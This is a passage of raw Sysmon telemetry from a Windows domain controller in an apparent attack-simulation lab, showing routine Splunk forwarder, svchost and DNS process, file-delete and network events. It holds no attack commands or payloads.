13:50:19.558{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199735Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.558{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199734Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.558{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002199733Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.558{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E59B-6040-C44D-00000000AD01}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002199732Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.558{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E59B-6040-C44D-00000000AD01}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002199731Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.560{5ABCFE62-E59B-6040-C44D-00000000AD01}6640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002199730Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.293{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7D74536BB66C2B1465C2F8ACDBAE3AA8,SHA256=107EFAA833507A5BECFD437537EAAB11EC6A6C53DE91CE97B2A31D8E1B74E832,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199729Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.136{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC08B27ED456E279064FCEB8F3E91307,SHA256=B90BC3166766DDFC46D66A8EC86EC680D1D092BC1419657B8EAF3DB7AB3B68C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002199728Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:19.105{5ABCFE62-E59A-6040-C34D-00000000AD01}58245260C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002199741Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:20.652{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2879D94A049F4933353F2461F069D2E5,SHA256=7D51E3629403353CC158D02671DF2C9B5851480A5616E1C57C4CDC85DEA578CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199740Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:20.136{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F16E7A25423CDB1A21D8B18483FF1BA,SHA256=2D69CE3D90C75C74471FABDF58114852FF6BFE7D16E5776BED798BB416AAFF9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199743Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:21.808{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=81C268242479517307DD503E032A9540,SHA256=8B767907E23A940A80E19D8AF2E779E22822D678CB05EA0FB87EF2DEFBF5D2E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199742Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:21.152{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0585CD34A9BEB0C32D5943079E9E77D0,SHA256=7E3AE17BFBAFDDEC5BAF76779803CA4CF0C52EFEB503BDE177B230493115161F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199745Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:22.183{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C7B8DF2866D2411AF3ABD3FAE74A42A,SHA256=EEC7FD6201B16F2AD2265628FF88377B39D5836D6FCB1AC83F4AF1F2BA319CA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199744Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:22.183{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=0565B27700DAE33C6BD834ADB4E2DA43,SHA256=7B8B382E425EE329B286014E7769C4FF0C32E22AA65CE4C00C5404828C097637,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199748Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:20.007{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55071-false10.0.1.12-8000- 23542300x80000000000000002199747Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:23.199{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FE61D5E5A8CDA37440AC419B2D4C1B,SHA256=1AF46299301359B3601690E1012218899B29DE1A6B98ED8C823CF463DA9D7CD2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199746Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:23.183{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F177B4C97D0E02DAA8A722AC09C394B,SHA256=9338E412CB00BE3742A45AF4833AF4FD99FDDCDAB2587963D2E37BB0EE9E4079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199750Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:24.605{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9C415795A30D3F9E36269D4F3D1CECD,SHA256=29DF1404C3AB8ABD80C28E362A01FB019CD54E25A22CF06A7964A364B3443787,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199749Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:24.230{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=424C3039E97B4774F5308736211E07C7,SHA256=C0988911222890811EEB038744621B83DC54C49E249C0D609801861D28B2992A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199751Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:25.246{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EF0A3E49C4DA73B5B5C2C158D3D378C,SHA256=A7E25B79C567B347FCA95C60262CBEE84075ACC3F942E718C7415EF321A18AA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199752Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:26.246{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94D3CCA2933FF738CE42C7AABCBDEDF6,SHA256=12963BB114AC2233C80A18B492AFFAB23BE755AD404FC9E8E8E4206470762C47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199753Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:27.293{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9D5A81783B01C1A395AFB9D356BB0FD,SHA256=5FB2AB48D7697006205AFD1DEBD3078A12E9D8EAAB624427424465916A77773B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199755Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:28.308{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C22EE93774DA96B35AE5223FF4BB463F,SHA256=C18232CF922275A3742639D9339AE51E3EC746431B028655C64D061A14888CF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199754Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:28.246{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99535950DF90587168EED69DAD95CDE4,SHA256=BAE030F541F7002E76E98D5AE74601938696F11CD63A8FF3DACE241D6E139C93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199757Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:29.324{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=427548DD1EB74E474827E1E8270226F6,SHA256=BDAF40FE39ED949B01A3C31C71D6785BF99030324ABCA39506FFD65247771074,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199756Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:25.054{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55072-false10.0.1.12-8000- 23542300x80000000000000002199758Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:30.340{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1531A5B293289C61AF0674B5DD5CCFC6,SHA256=B2F741D9FB1C08DD3E4FEFEF7819D0CA63A4E36E5FCF36CC6A6E68B76EFC862B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199759Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:31.341{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D979024B3371ECCA87DA2EE8B7B4D86C,SHA256=5FCC6C3531D9FF9A64529F05BA30D6D9C58C814688DE36C0A5E16AB9C8866544,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199760Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:32.341{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ED6CD4CF8E011D04D65912EAB3E5F40,SHA256=8727DA2D994C878691105F5A0F0928ECD70C19B71454829C5935ED9CC07C29CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199761Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:33.356{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06ADCCEDF1F112B910E56EF0427BEC9D,SHA256=8171740CCF425701E3BF1C08D0C3595AFD1E3A6032E79243F4669A4A1A6A2C25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199764Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:34.356{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51CEC344A61F55E5F930AA3E1FA8CEC6,SHA256=CA7923E3DEF81B303FEFB69F78B23BC81E7E29D8AB088BBEC84BC404B29713BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199763Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:34.091{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E4CA1A789155319D6BEAA368F730257,SHA256=3482CE67EDA5AECE5A9FD385CC3ADD5CC45BF01B13A0A904FDEF1442D36FB016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199762Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:34.091{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=486516BF2583A712E6B97AC7F0CA8EC6,SHA256=12B7CB92E0501072EA75CCD134383D59AD14F7839529D36D385D3A11B36C0453,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199767Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:35.372{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEBDA874C889BEDD68DA5D08CD826365,SHA256=982C1901BC2C05B3123BD32A1F28F30B3CBBACFCC025B5FEE3E15E9197D5B965,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199766Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:30.914{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55073-false10.0.1.12-8000- 23542300x80000000000000002199765Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:35.294{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E4CA1A789155319D6BEAA368F730257,SHA256=3482CE67EDA5AECE5A9FD385CC3ADD5CC45BF01B13A0A904FDEF1442D36FB016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199769Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:36.450{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33665960DDCF378CFE7ADCC5E3F31668,SHA256=204E950B2849F3D7029BB2193633A78EF717C445B4F125880A1318AB6FF7A62E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199768Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:32.102{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local60324- 23542300x80000000000000002199771Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:37.481{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=671D128E18A6378354FFB8EF295C0EAE,SHA256=55D41E96706A551616E27EDF4E2688B2B316D57C7F9C3B2140DE528A865E7C63,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199770Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:33.117{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-60324- 23542300x80000000000000002199772Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:38.481{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A24B7CAC369D890FCFF266F6186ACA43,SHA256=0AE61DEB65EAF65C9B9441EFD15636D0D4B2445E333DF0C2E7914E1269CE925B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199774Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:39.481{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABCB1BB0EDB65BECBB8293BE3008B1A3,SHA256=828F1C497640F064199592BD451F793F5469ED04E5B396C241266971C8663038,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199773Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:39.153{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=37F8A70AFB7723444929170E165AB98B,SHA256=C0A7FAC43F8DB2182759DBE5103440CEBC282E21A08DFA004BDBE863C402C51D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002199776Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:40.497{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B780262FEE7A346C384BE750CECEDA0A,SHA256=F4C94516943E4EDF77D889B584784FE5EC0DB9151222BE31DA43BBE79E9B19FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002199775Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:35.961{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55074-false10.0.1.12-8000- 23542300x80000000000000002199777Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:50:41.513{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 